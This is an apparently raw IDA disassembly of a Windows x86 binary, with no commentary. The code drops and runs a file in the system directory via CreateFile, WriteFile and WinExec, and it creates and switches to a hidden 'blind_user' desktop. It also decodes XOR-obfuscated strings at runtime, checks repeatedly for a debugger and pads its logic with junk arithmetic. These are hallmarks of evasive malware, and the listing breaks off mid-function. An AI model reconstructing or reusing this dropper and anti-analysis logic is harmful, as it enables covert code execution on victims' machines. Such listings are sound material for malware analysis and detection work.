lea eax, [ebp+var_FF]
push eax
call sub_40C9A4 ; GetSystemDirectoryA
mov [ebp+var_14B8], 4E5Dh
mov eax, [ebp+var_14B8]
mov edx, eax
add edx, eax
mov [ebp+var_14B8], edx
push 0Fh
push offset word_4474FA
call sub_404170
lea edi, [ebp+var_FF]
push edi
push eax
lea edi, [ebp+var_11FD]
push edi
call sub_40CE54
push 0Ah
push offset byte_4474EF
call sub_404170
lea edi, [ebp+var_FF]
push edi
push eax
lea edi, [ebp+var_1497]
push edi
call sub_40CE54
push 8
push offset word_4474E6
call sub_404170
push eax
lea edi, [ebp+var_FF]
push edi
call sub_40CE78
add esp, 38h
jmp loc_4043D0
; ---------------------------------------------------------------------------
loc_40431F: ; CODE XREF: sub_4041FC+8C�j
call sub_40CA58 ; IsDebuggerPresent
push 0FFh
lea eax, [ebp+var_FF]
push eax
call sub_40C9F8 ; GetWindowsDirectoryA
call sub_40CA58 ; IsDebuggerPresent
push 0Fh
push offset word_4474D6
call sub_404170
lea edi, [ebp+var_FF]
push edi
push eax
lea edi, [ebp+var_11FD]
push edi
call sub_40CE54
mov word ptr [ebp+var_14B8], 38D2h
sub word ptr [ebp+var_14B8], 9Dh
push 0Eh
push offset byte_4474C7
call sub_404170
lea edi, [ebp+var_FF]
push edi
push eax
lea edi, [ebp+var_1497]
push edi
call sub_40CE54
mov word ptr [ebp+var_14B8+2], 1DC1h
movzx eax, word ptr [ebp+var_14B8+2]
mov edx, eax
add edx, eax
mov eax, edx
mov word ptr [ebp+var_14B8+2], ax
push 0Ch
push offset word_4474BA
call sub_404170
push eax
lea edi, [ebp+var_FF]
push edi
call sub_40CE78
add esp, 38h
mov eax, dword_442269
mov [ebp+var_14BC], eax
loc_4043D0: ; CODE XREF: sub_4041FC+11E�j
lea eax, [ebp+var_1497]
push eax
call sub_40C908 ; DeleteFileA
mov ax, word_44226D
mov [ebp+var_14A2], ax
lea edi, [ebp+var_14A5]
lea esi, byte_44226F
mov ecx, 3
rep movsb
push 0
push 80h
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_11FD]
push eax
call sub_40CAD0 ; CreateFileA
mov ebx, eax
mov [ebp+var_1394], 223Ch
add [ebp+var_1394], 322Fh
push 39h
push offset dword_447480
call sub_404170
lea edi, [ebp+var_11FD]
push edi
lea edi, [ebp+var_12FC]
push edi
lea edi, [ebp+var_12FC]
push edi
push eax
lea edi, [ebp+var_10FE]
push edi
call sub_40CE54
add esp, 1Ch
mov [ebp+var_1396], 4109h
movzx eax, [ebp+var_1396]
imul eax, 6070h
mov [ebp+var_1396], ax
lea ecx, [ebp+var_10FE]
or eax, 0FFFFFFFFh
loc_404487: ; CODE XREF: sub_4041FC+290�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_404487
push 0
lea esi, [ebp+var_14AC]
push esi
push eax
lea edi, [ebp+var_10FE]
push edi
push ebx
call sub_40CB48 ; WriteFile
mov [ebp+var_1398], 6700h
movzx eax, [ebp+var_1398]
imul eax, 772h
mov [ebp+var_1398], ax
push ebx
call sub_40C9B0 ; CloseHandle
lea edi, [ebp+var_14B3]
lea esi, aBzvype ; "BzVYpE"
mov ecx, 7
rep movsb
push 8
push offset aCC ; "紻״"
call sub_404170
add esp, 8
lea edi, [ebp+var_11FD]
push edi
lea edi, [ebp+var_FF]
push edi
push eax
lea edi, [ebp+var_10FE]
push edi
call sub_40CE54
add esp, 10h
call sub_40C938 ; GetCurrentProcessId
push 0
lea eax, [ebp+var_10FE]
push eax
call sub_40CB3C ; WinExec
call sub_40CA58 ; IsDebuggerPresent
pop edi
pop esi
pop ebx
leave
retn
sub_4041FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404525 proc near ; DATA XREF: sub_43F771+A6�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_442284
lea eax, ds:430DA0h[eax]
push eax
call sub_40CE18
add esp, 0Ch
xor edi, edi
jmp short loc_404562
; ---------------------------------------------------------------------------
loc_40454B: ; CODE XREF: sub_404525+3F�j
mov eax, dword_442284
add eax, edi
lea eax, ds:430DA0h[eax]
movsx edx, byte ptr [eax]
xor edx, 74h
mov [eax], dl
inc edi
loc_404562: ; CODE XREF: sub_404525+24�j
cmp edi, esi
jl short loc_40454B
mov eax, dword_442284
add eax, esi
mov byte ptr ds:dword_430DA0[eax], 0
xor edi, edi
mov edi, dword_442284
add dword_442284, 3
mov eax, dword_442284
lea eax, [eax+esi+4]
mov dword_442284, eax
add dword_442284, 2
cmp dword_442284, 0DC3h
jle short loc_4045AC
and dword_442284, 0
loc_4045AC: ; CODE XREF: sub_404525+7E�j
mov [ebp+var_4], 0ACh
lea eax, dword_430DA0[edi]
pop edi
pop esi
leave
retn
sub_404525 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4045BD proc near ; CODE XREF: sub_4063C4+1E4�p
; sub_408C17+1CB�p
var_8 = dword ptr -8
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
lea edi, [ebp+var_2]
lea esi, dword_44228C
xor ecx, ecx
inc ecx
rep movsb
cmp dword_442288, 0
jz short loc_404617
mov [ebp+var_3], 4Ah
movzx eax, [ebp+var_3]
imul eax, 7338h
mov [ebp+var_3], al
call sub_40C944 ; GetCurrentThreadId
push eax
call sub_40CC5C ; GetThreadDesktop
mov [ebp+var_8], eax
call sub_40C9D4 ; GetVersion
mov eax, dword_442288
cmp [ebp+var_8], eax
jnz short loc_404645
mov [ebp+var_4], 0A9h
add [ebp+var_4], 1
xor eax, eax
inc eax
jmp short loc_404665
; ---------------------------------------------------------------------------
loc_404617: ; CODE XREF: sub_4045BD+1D�j
push 0
push 0C7h
push 0
push 0
push 0
push offset aBlind_user ; "blind_user"
call sub_40CC44 ; CreateDesktopA
mov dword_442288, eax
call sub_40C9C8 ; GetTickCount
cmp dword_442288, 0
jnz short loc_404645
xor eax, eax
jmp short loc_404665
; ---------------------------------------------------------------------------
loc_404645: ; CODE XREF: sub_4045BD+4B�j
; sub_4045BD+82�j
push dword_442288
call sub_40CC50 ; SetThreadDesktop
mov ebx, eax
mov [ebp+var_1], 99h
movzx eax, [ebp+var_1]
imul eax, 5AD0h
mov [ebp+var_1], al
mov eax, ebx
loc_404665: ; CODE XREF: sub_4045BD+58�j
; sub_4045BD+86�j
pop edi
pop esi
pop ebx
leave
retn
sub_4045BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40466A proc near ; CODE XREF: sub_4063C4+26A�p
; sub_408C17+255�p
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push eax
mov ecx, 1290h
mov eax, 170Eh
mul ecx
mov [ebp+var_8], eax
mov ecx, eax
mov eax, [ebp+arg_0]
lea edx, aBlind_user ; "blind_user"
mov [eax+8], edx
mov [ebp+var_1], 28h
sub_40466A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404690 proc near ; DATA XREF: sub_43F771+5D2�o
movzx eax, byte ptr [ebp-1]
imul eax, 15B8h
mov [ebp-1], al
leave
retn
sub_404690 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40469F proc near ; CODE XREF: sub_40472A+65�p
; sub_40479E+35�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_442298
lea eax, ds:417590h[eax]
push eax
call sub_40CE18
add esp, 0Ch
mov [ebp+var_4], 267h
xor edi, edi
jmp short loc_4046E3
; ---------------------------------------------------------------------------
loc_4046CC: ; CODE XREF: sub_40469F+46�j
mov eax, dword_442298
add eax, edi
lea eax, ds:417590h[eax]
movsx edx, byte ptr [eax]
xor edx, 16h
mov [eax], dl
inc edi
loc_4046E3: ; CODE XREF: sub_40469F+2B�j
cmp edi, esi
jl short loc_4046CC
mov eax, dword_442298
add eax, esi
mov byte ptr ds:dword_417590[eax], 0
mov edi, dword_442298
add dword_442298, 3
mov eax, dword_442298
add eax, 4
add eax, esi
sub_40469F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40470D proc near ; DATA XREF: sub_43F771+600�o
mov dword_442298, eax
cmp eax, 0DCDh
jle short loc_404720
and dword_442298, 0
loc_404720: ; CODE XREF: sub_40470D+A�j
lea eax, dword_417590[edi]
pop edi
pop esi
leave
retn
sub_40470D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40472A proc near ; CODE XREF: sub_4056CB+6E5�p
; sub_4056CB+7B4�p ...
var_10C = byte ptr -10Ch
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov [ebp+var_100], 95h
sub [ebp+var_100], 4Ch
push [ebp+arg_4]
push ebx
call sub_40CE78
add esp, 8
lea edi, [ebp+var_10C]
lea esi, a5gl ; "/% 5gl;"
movsd
movsd
call sub_40CE3C
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_40486D
call sub_40CA58 ; IsDebuggerPresent
mov [ebp+var_FF], 0
call sub_40C968 ; RtlGetLastWin32Error
push 3
push offset a96 ; "9<6"
call sub_40469F
push eax
push ebx
call sub_40CE78
add esp, 10h
sub_40472A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40479E proc near ; DATA XREF: sub_43F771+502�o
lea edi, [ebp-112h]
lea esi, aSa ; "* S"
mov ecx, 5
rep movsb
mov byte ptr [ebp-10Dh], 0
jmp short loc_404815
; ---------------------------------------------------------------------------
loc_4047BA: ; CODE XREF: sub_40479E+7F�j
call sub_40CE3C
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_40480E
push 4
push offset a3e3u ; "3e3u"
call sub_40469F
mov [ebp-120h], eax
call sub_40CE3C
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-120h]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40CE54
add esp, 18h
loc_40480E: ; CODE XREF: sub_40479E+2C�j
add byte ptr [ebp-10Dh], 1
loc_404815: ; CODE XREF: sub_40479E+1A�j
mov al, [ebp-10Dh]
cmp al, 0Ah
jb short loc_4047BA
lea edi, [ebp-119h]
lea esi, aSWrH ; "s+wR~H"
mov ecx, 7
rep movsb
lea eax, [ebp-0FFh]
push eax
push ebx
call sub_40CE78
call sub_40C938 ; GetCurrentProcessId
push 3
push offset a69 ; "6<9"
call sub_40469F
push eax
push ebx
call sub_40CE78
add esp, 18h
lea edi, [ebp-11Ch]
lea esi, a7 ; "7^"
mov ecx, 3
rep movsb
loc_40486D: ; CODE XREF: sub_40472A+47�j
call sub_40CE3C
mov ecx, 0Ah
cdq
sub_40479E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404878 proc near ; DATA XREF: sub_43F771+55B�o
idiv ecx
cmp edx, 5
jge loc_404950
call sub_40C998 ; GetProcessHeap
push 10h
push offset aWd63u3u3u663c ; "`wd63u3u3u6+63c-"
call sub_40469F
mov [ebp-114h], eax
call sub_40CE3C
mov [ebp-118h], eax
call sub_40CE3C
mov [ebp-11Ch], eax
call sub_40CE3C
mov [ebp-120h], eax
call sub_40CE3C
mov ecx, 0EA60h
cdq
idiv ecx
push edx
mov edi, [ebp-120h]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp-11Ch]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp-118h]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp-114h]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40CE54
call sub_40C9D4 ; GetVersion
lea eax, [ebp-0FFh]
push eax
push ebx
call sub_40CE78
add esp, 28h
mov word ptr [ebp-10Eh], 0E65h ; DATA XREF: sub_43F771+41D�r
movzx eax, word ptr [ebp-10Eh]
imul eax, 478Eh
mov [ebp-10Eh], ax
loc_404950: ; CODE XREF: sub_404878+5�j
call sub_40CE3C
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_404A07
call sub_40C9C8 ; GetTickCount
push 0Ah
push offset byte_447443
call sub_40469F
mov [ebp-114h], eax
call sub_40CE3C
mov [ebp-118h], eax
call sub_40CE3C
mov [ebp-11Ch], eax
call sub_40CE3C
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp-11Ch]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp-118h]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp-114h]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40CE54
mov word ptr [ebp-10Eh], 21A9h
sub word ptr [ebp-10Eh], 1F60h ; DATA XREF: sub_43F771+2A�o
lea eax, [ebp-0FFh]
push eax
push ebx
call sub_40CE78
add esp, 24h
loc_404A07: ; CODE XREF: sub_404878+E8�j
call sub_40CE3C
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404A2F
push 2
push offset byte_447440
call sub_40469F
push eax
push ebx
call sub_40CE78
add esp, 10h
loc_404A2F: ; CODE XREF: sub_404878+19F�j
; DATA XREF: sub_440172+12�o
mov dword ptr [ebp-104h], 29E2h
sub dword ptr [ebp-104h], 2A26h
pop edi
pop esi
pop ebx
leave
retn
sub_404878 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404A48 proc near ; CODE XREF: sub_4056CB+197�p
; sub_4056CB+1C8�p ...
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_116 = byte ptr -116h
var_10F = byte ptr -10Fh
var_108 = word ptr -108h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov ax, word_4422B3
mov [ebp+var_108], ax
push [ebp+arg_4]
push ebx
call sub_40CE78
add esp, 8
lea edi, [ebp+var_10F]
lea esi, aJ@6lO ; "j@6l^o"
mov ecx, 7
rep movsb
call sub_40CE3C
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_404C4B
mov [ebp+var_11C], 19DCh
mov eax, 3073h
mul [ebp+var_11C]
mov [ebp+var_124], eax
mov [ebp+var_11C], eax
mov [ebp+var_FF], 0
mov [ebp+var_120], 3B4h
inc [ebp+var_120]
push 5
push offset a76 ; "*7;;6"
call sub_40469F
push eax
push ebx
call sub_40CE78
add esp, 10h
mov [ebp+var_116], 0
jmp loc_404BFB
sub_404A48 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_404BA0
loc_404AF3: ; CODE XREF: sub_404BA0+63�j
call sub_40C938 ; GetCurrentProcessId
call sub_40CE3C
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404B4C
push 4
push offset a3e3u ; "3e3u"
call sub_40469F
mov [ebp-128h], eax
call sub_40CE3C
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-128h]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40CE54
add esp, 18h
loc_404B4C: ; CODE XREF: sub_404BA0-98�j
call sub_40CE3C
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short sub_404BA0
push 4
push offset a3e3u ; "3e3u"
call sub_40469F
mov [ebp-12Ch], eax
call sub_40CE3C
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 41h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-12Ch]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40CE54
add esp, 18h
; END OF FUNCTION CHUNK FOR sub_404BA0
; =============== S U B R O U T I N E =======================================
sub_404BA0 proc near ; CODE XREF: sub_404BA0-44�j
; DATA XREF: sub_440172+143�o
; FUNCTION CHUNK AT 00404AF3 SIZE 000000AD BYTES
call sub_40CE3C
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 7
jge short loc_404BF4
push 4
push offset a3e3u ; "3e3u"
call sub_40469F
mov [ebp-130h], eax
call sub_40CE3C
mov ecx, 9
cdq
idiv ecx
mov edi, edx
add edi, 30h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-130h]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40CE54
add esp, 18h
loc_404BF4: ; CODE XREF: sub_404BA0+10�j
add byte ptr [ebp-116h], 1
loc_404BFB: ; CODE XREF: sub_404A48+A6�j
mov al, [ebp-116h]
cmp al, 0Ah
jb loc_404AF3
lea eax, [ebp-0FFh]
push eax
push ebx
call sub_40CE78
call sub_40C944 ; GetCurrentThreadId
push 4
push offset a6 ; ";;(6"
call sub_40469F
push eax
push ebx
call sub_40CE78
add esp, 18h
mov byte ptr [ebp-117h], 0F0h
movzx eax, byte ptr [ebp-117h]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp-117h], al
loc_404C4B: ; CODE XREF: sub_404A48+4B�j
call sub_40CE3C
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_404DD9
call sub_40CA58 ; IsDebuggerPresent
mov byte ptr [ebp-0FFh], 0
mov byte ptr [ebp-116h], 0
jmp loc_404D9A
sub_404BA0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_404D70
loc_404C79: ; CODE XREF: sub_404D70+32�j
call sub_40C9C8 ; GetTickCount
call sub_40CE3C
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 4
jge short loc_404CD2
push 4
push offset a3e3u ; "3e3u"
call sub_40469F
mov [ebp-124h], eax
call sub_40CE3C
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-124h]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40CE54
add esp, 18h
loc_404CD2: ; CODE XREF: sub_404D70-E2�j
call sub_40C9C8 ; GetTickCount
call sub_40CE3C
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 4
jge short loc_404D2B
push 4
push offset a3e3u ; "3e3u"
call sub_40469F
mov [ebp-128h], eax
call sub_40CE3C
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 41h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-128h]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40CE54
add esp, 18h
loc_404D2B: ; CODE XREF: sub_404D70-89�j
call sub_40CE3C
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 3
jge short loc_404D7F
push 4
push offset a3e3u ; "3e3u"
call sub_40469F
; END OF FUNCTION CHUNK FOR sub_404D70
; =============== S U B R O U T I N E =======================================
sub_404D49 proc near ; DATA XREF: .data:0043FF5A�o
mov [ebp-12Ch], eax
call sub_40CE3C
mov ecx, 9
cdq
sub_404D49 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404D5A proc near ; DATA XREF: sub_43F771+7E�o
idiv ecx
mov edi, edx
add edi, 30h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-12Ch]
push edi
sub_404D5A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404D70 proc near ; DATA XREF: .data:0043F50D�o
; FUNCTION CHUNK AT 00404C79 SIZE 000000D0 BYTES
lea edi, [ebp-0FFh]
push edi
call sub_40CE54
add esp, 18h
loc_404D7F: ; CODE XREF: sub_404D70-35�j
mov dword ptr [ebp-120h], 2A38h
add dword ptr [ebp-120h], 7A71h
add byte ptr [ebp-116h], 1
loc_404D9A: ; CODE XREF: sub_404BA0+D4�j
mov al, [ebp-116h]
cmp al, 32h
jb loc_404C79
lea eax, [ebp-0FFh]
push eax
push ebx
call sub_40CE78
add esp, 8
mov dword ptr [ebp-11Ch], 7B9Eh
mov eax, 3953h
mul dword ptr [ebp-11Ch]
mov [ebp-120h], eax
mov [ebp-11Ch], eax
loc_404DD9: ; CODE XREF: sub_404BA0+BB�j
call sub_40CE3C
mov ecx, 0Ah
sub_404D70 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404DE3 proc near ; DATA XREF: sub_43F320+6�o
cdq
idiv ecx
cmp edx, 5
jge short loc_404E01
push 4
push offset aTd ; "*td("
call sub_40469F
push eax
push ebx
call sub_40CE78
add esp, 10h
loc_404E01: ; CODE XREF: sub_404DE3+6�j
call sub_40CE3C
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404E29
push 3
push offset dword_44742C
call sub_40469F
push eax
push ebx
call sub_40CE78
add esp, 10h
loc_404E29: ; CODE XREF: sub_404DE3+2E�j
lea edi, [ebp-112h]
lea esi, asc_4422BC ; "&<"
mov ecx, 3
rep movsb
call sub_40CE3C
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404E64
push 3
push offset dword_447428
call sub_40469F
push eax
push ebx
call sub_40CE78
add esp, 10h
loc_404E64: ; CODE XREF: sub_404DE3+69�j
call sub_40C968 ; RtlGetLastWin32Error
call sub_40CE3C
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404E91
push 3
push offset dword_447424
call sub_40469F
push eax
push ebx
call sub_40CE78
add esp, 10h
loc_404E91: ; CODE XREF: sub_404DE3+96�j
mov byte ptr [ebp-105h], 3Dh
movzx eax, byte ptr [ebp-105h]
imul eax, 5DA3h
mov [ebp-105h], al
call sub_40CE3C
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404ED3
push 4
push offset byte_44741F
call sub_40469F
push eax
push ebx
call sub_40CE78
add esp, 10h
loc_404ED3: ; CODE XREF: sub_404DE3+D8�j
mov byte ptr [ebp-106h], 2Ah
sub byte ptr [ebp-106h], 18h
call sub_40CE3C
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404F09
push 4
push offset a9t ; "*9t("
call sub_40469F
push eax
push ebx
call sub_40CE78
add esp, 10h
loc_404F09: ; CODE XREF: sub_404DE3+10E�j
call sub_40CE3C
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404F31
push 4
push offset a9c ; "*9c("
call sub_40469F
push eax
push ebx
call sub_40CE78
add esp, 10h
loc_404F31: ; CODE XREF: sub_404DE3+136�j
lea edi, [ebp-115h]
lea esi, aM ; "~M"
mov ecx, 3
rep movsb
call sub_40CE3C
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404F6C
push 7
push offset a9pyxb ; "*9pyxb("
call sub_40469F
push eax
push ebx
call sub_40CE78
add esp, 10h
loc_404F6C: ; CODE XREF: sub_404DE3+171�j
mov dword ptr [ebp-104h], 115Ch
mov eax, [ebp-104h]
mov edx, eax
add edx, eax
mov [ebp-104h], edx
call sub_40CE3C
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404FAE
push 8
push offset aUsxbsd ; "*usxbsd("
call sub_40469F
push eax
push ebx
call sub_40CE78
add esp, 10h
loc_404FAE: ; CODE XREF: sub_404DE3+1B3�j
call sub_40CA58 ; IsDebuggerPresent
call sub_40CE3C
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404FDB
push 9
push offset a9usxbsd ; "*9usxbsd("
call sub_40469F
push eax
push ebx
call sub_40CE78
add esp, 10h
loc_404FDB: ; CODE XREF: sub_404DE3+1E0�j
call sub_40C9D4 ; GetVersion
call sub_40CE3C
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_405008
push 2
push offset byte_447440
call sub_40469F
push eax
push ebx
call sub_40CE78
add esp, 10h
loc_405008: ; CODE XREF: sub_404DE3+20D�j
pop edi
pop esi
pop ebx
leave
retn
sub_404DE3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40500D proc near ; CODE XREF: sub_405098+54�p
; sub_405098+97�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_4422CC
lea eax, ds:436200h[eax]
push eax
call sub_40CE18
add esp, 0Ch
mov [ebp+var_4], 267h
xor edi, edi
jmp short loc_405051
; ---------------------------------------------------------------------------
loc_40503A: ; CODE XREF: sub_40500D+46�j
mov eax, dword_4422CC
add eax, edi
lea eax, ds:436200h[eax]
movsx edx, byte ptr [eax]
xor edx, 16h
mov [eax], dl
inc edi
loc_405051: ; CODE XREF: sub_40500D+2B�j
cmp edi, esi
jl short loc_40503A
mov eax, dword_4422CC
add eax, esi
mov byte ptr ds:dword_436200[eax], 0
mov edi, dword_4422CC
add dword_4422CC, 3
mov eax, dword_4422CC
add eax, 4
add eax, esi
mov dword_4422CC, eax
cmp eax, 0DCDh
jle short loc_40508E
and dword_4422CC, 0
loc_40508E: ; CODE XREF: sub_40500D+78�j
lea eax, dword_436200[edi]
pop edi
pop esi
leave
retn
sub_40500D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405098 proc near ; CODE XREF: sub_405249:loc_4052E8�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
push ebx
push esi
push edi
mov [ebp+var_15], 95h
sub [ebp+var_15], 4Ch
xor ebx, ebx
inc ebx
push [ebp+arg_0]
call sub_40CDA0 ; GetSidIdentifierAuthority
mov [ebp+var_14], eax
call sub_40C998 ; GetProcessHeap
push [ebp+arg_0]
call sub_40CDB8 ; GetSidSubAuthorityCount
movzx edi, byte ptr [eax]
mov [ebp+var_10], edi
call sub_40C9D4 ; GetVersion
mov eax, 0Ch
mul [ebp+var_10]
mov [ebp+var_1C], eax
add eax, 1Ch
mov [ebp+var_C], eax
call sub_40C998 ; GetProcessHeap
push 6
push offset aE3zc ; "E;3zc;"
call sub_40500D
push ebx
push eax
push [ebp+arg_4]
call sub_40CC80 ; wsprintfA
add esp, 14h
mov [ebp+var_C], eax
call sub_40C998 ; GetProcessHeap
mov eax, [ebp+var_C]
add eax, [ebp+arg_4]
mov [ebp+var_8], eax
mov eax, [ebp+var_14]
cmp byte ptr [eax], 0
jnz short loc_40511D
cmp byte ptr [eax+1], 0
jz short loc_405181
loc_40511D: ; CODE XREF: sub_405098+7D�j
lea edi, [ebp+var_24]
lea esi, aAnvf ; "AnVF * "
movsd
movsd
push 20h
push offset aN3N3N3N3N3N3N ; "&n3&$~n3&$~n3&$~n3&$~n3&$~n3&$~n"
call sub_40500D
mov edi, [ebp+var_14]
movzx esi, byte ptr [edi+5]
movzx esi, si
push esi
movzx esi, byte ptr [edi+4]
movzx esi, si
push esi
movzx esi, byte ptr [edi+3]
movzx esi, si
push esi
movzx esi, byte ptr [edi+2]
movzx esi, si
push esi
movzx esi, byte ptr [edi+1]
movzx esi, si
push esi
movzx edi, byte ptr [edi]
movzx edi, di
push edi
push eax
push [ebp+var_8]
call sub_40CC80 ; wsprintfA
add esp, 28h
mov ebx, eax
add [ebp+var_C], ebx
mov eax, ebx
add eax, [ebp+var_8]
mov [ebp+var_8], eax
jmp short loc_4051E8
; ---------------------------------------------------------------------------
loc_405181: ; CODE XREF: sub_405098+83�j
mov [ebp+var_20], 5F7h
mov eax, [ebp+var_20]
mov edx, eax
add edx, eax
mov [ebp+var_20], edx
push 3
push offset a3zc_0 ; "3zc"
call sub_40500D
mov edi, [ebp+var_14]
movzx esi, byte ptr [edi+5]
movzx edx, byte ptr [edi+4]
shl edx, 8
add esi, edx
movzx edx, byte ptr [edi+3]
shl edx, 10h
add esi, edx
movzx edi, byte ptr [edi+2]
shl edi, 18h
add esi, edi
push esi
push eax
push [ebp+var_8]
call sub_40CC80 ; wsprintfA
add esp, 14h
mov ebx, eax
mov [ebp+var_24], 2AFh
add [ebp+var_24], 7A76h
add [ebp+var_C], ebx
mov eax, ebx
add eax, [ebp+var_8]
mov [ebp+var_8], eax
loc_4051E8: ; CODE XREF: sub_405098+E7�j
and [ebp+var_4], 0
jmp short loc_40523C
; ---------------------------------------------------------------------------
loc_4051EE: ; CODE XREF: sub_405098+1AA�j
lea edi, [ebp+var_20+3]
lea esi, dword_4422D8
xor ecx, ecx
inc ecx
rep movsb
push 4
push offset a3zc ; ";3zc"
call sub_40500D
mov [ebp+var_24], eax
push [ebp+var_4]
push [ebp+arg_0]
call sub_40CDAC ; GetSidSubAuthority
push dword ptr [eax]
mov edi, [ebp+var_24]
push edi
push [ebp+var_8]
call sub_40CC80 ; wsprintfA
